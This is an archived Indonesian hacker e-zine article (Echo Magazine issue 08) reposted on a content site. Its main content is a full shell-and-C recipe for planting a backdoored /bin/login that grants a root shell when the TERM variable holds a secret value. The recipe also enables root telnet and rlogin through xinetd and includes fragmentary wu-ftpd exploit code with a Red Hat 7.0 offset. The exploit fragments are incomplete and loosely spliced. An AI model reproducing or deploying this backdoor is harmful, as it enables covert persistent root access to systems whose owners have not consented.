Copy Link
Add to Bookmark
Report

Echo Magazine Issue 08 Phile 0x015

eZine's profile picture
Published in 
Echo Magazine
 · 4 years ago

  



____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/


.OR.ID
ECHO-ZINE RELEASE
08

Author: syzwz/bosen/sakitjiwa/1ndonesia.security.team ||
sysadmin@belihosting.com, sakitjiwa@antihackerlink.or.id,
sakitjiwa@corebsd.or.id, sakit.jiwa@unix.net
Online @ www.echo.or.id :: http://ezine.echo.or.id

== merakit Telnetd / rlogin Backdoor ==


Dengan menyebut nama Tuhan yang maha pengasih lagi maha penyayang

#making Telnetd / rlogin Backdoor
author syzwz
taken from bosen (telnetd backdor) aresu (fixed wuftpd)
this xploit(wuftd fixed) add at 1st Jan 2002 so if somebody in
indonesia tell to you another bosen or aresu
, he /her was found before 1st January 2002 he's lie or big lier or
whtf

cat >term.c <<__eof__
#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <sys/time.h>
#include <string.h>

#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/usr/bin/xstat"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "anjing23"
#define ENV_FIX "vt100"

int owned(void);

char **av, **ep;

int main(int argc, char **argv, char **envp) {
av=argv;
ep=envp;
av[0]=SHELL_CALLME;

if (owned()) {
char *sav[]={
SHELL_CALLME, NULL
};

execve(SHELL, sav, ep);
return 0;
}
execve(LOGIN, av, ep);
return 0;
}

int owned(void) {
char *name, *value;
int i;
for (i=0; ep[i]!=NULL; ++i) {
name=strtok(ep[i], "=");
value=strtok(NULL, "=");
if (name==NULL || value==NULL) continue;
if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
char tmp[100];
sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);
ep[i]=strdup(tmp);
return 1;
}
}
}
return 0;
}
__eof__
echo " "
echo "..now loading"
gcc -o login term.c
chown root.bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
mv login /bin/login
chmod 555 /usr/bin/xstat
chown root.bin /usr/bin/xstat
rm -f term.c

//running telnet and rlogin(this one i like) port in xinetd

cat > /etc/xinetd.d/telnet <<__eof__

# default: on
service telnet
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.telnetd
log_on_failure += USERID
}
__eof__

cat > /etc/xinetd.d/rlogin <<__eof__
service login
{
socket_type = stream
wait = no
user = root
log_on_success += USERID
log_on_failure += USERID
server = /usr/sbin/in.rlogind

}
__eof__

/etc/rc.d/init.d/xinetd reload

Byte Code for RH7.0 WuFtpd

cat >distro.h<<__eof__
"RH7.0 - 2.6.1(1) Wed Aug 9 05:54:50 EDT 2000",
0x08070cb0,0x8084600, 0,
__eof__

realcode taken from
http://crash.ihug.co.nz/~Sneuro/woot-exploit.tar.gz / unfixed
//fix wuftpd rootkit

main(int argc,char *argv[])
{
int l,m,n=0,o;
int got,inp,prp,are;

//then it

if(sscanf(ADDR,"%u.%u.%u.%u",&o,&o,&o,&o)==4)n=1;
prp=st+45000;
are=0x8098930;
for(l=prp;l<are;l+=360)

//then

if(!ok)usleep(1500000);
else usleep(150000); // needed so u can actually stop it.. hold down
^C

//if not found, add by your self

made in bandung, 0817 212 431 - 0856 217 3007
arif.wicaksono@coreBSD.or.id

maha benar tuhan dengan segala firmannya

REFERENSI a.k.a bacaan :
#irc.centrin.net.id #romance,#1stlink

*greetz to:
1. Allah SWT, papaku yang lagi sakit, mamaku yang perhatian, dan
semua komunitas underground indonesia yang nggak bisa disebut satu
persatu
2.1ndonesia security team won Hacking the box competition Kuala
Lumpur, http://forum.hackinthebox.org/viewforum.php?f=39,
ANTIHACKERLINK IS THE BEST, THX to m0s team!!!!!!”

kirimkan kritik && saran ke sysadmin@belihosting.com,
sakitjiwa@antihackerlink.or.id, sakitjiwa@corebsd.or.id,
sakit.jiwa@unix.net

------------------------------------------------------------------------
kalau.anda.kurang.puas.silahkan.kontak.kami - 0817 212 431 24 jam :)

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
12 Nov 2024
It is very remarkable that the period of Atlantis’s destruction, which occurred due to earthquakes and cataclysms, coincides with what is co ...

guest's profile picture
@guest
12 Nov 2024
Plato learned the legend through his older cousin named Critias, who, in turn, had acquired information about the mythical lost continent fr ...

guest's profile picture
@guest
10 Nov 2024
الاسم : جابر حسين الناصح - السن :٤٢سنه - الموقف من التجنيد : ادي الخدمه - خبره عشرين سنه منهم عشر سنوات في كبرى الشركات بالسعوديه وعشر سنوات ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
2 Nov 2024
In Sardinia, there is a legend known as the Legend of Tirrenide. Thousands of years ago, there was a continent called Tirrenide. It was a l ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT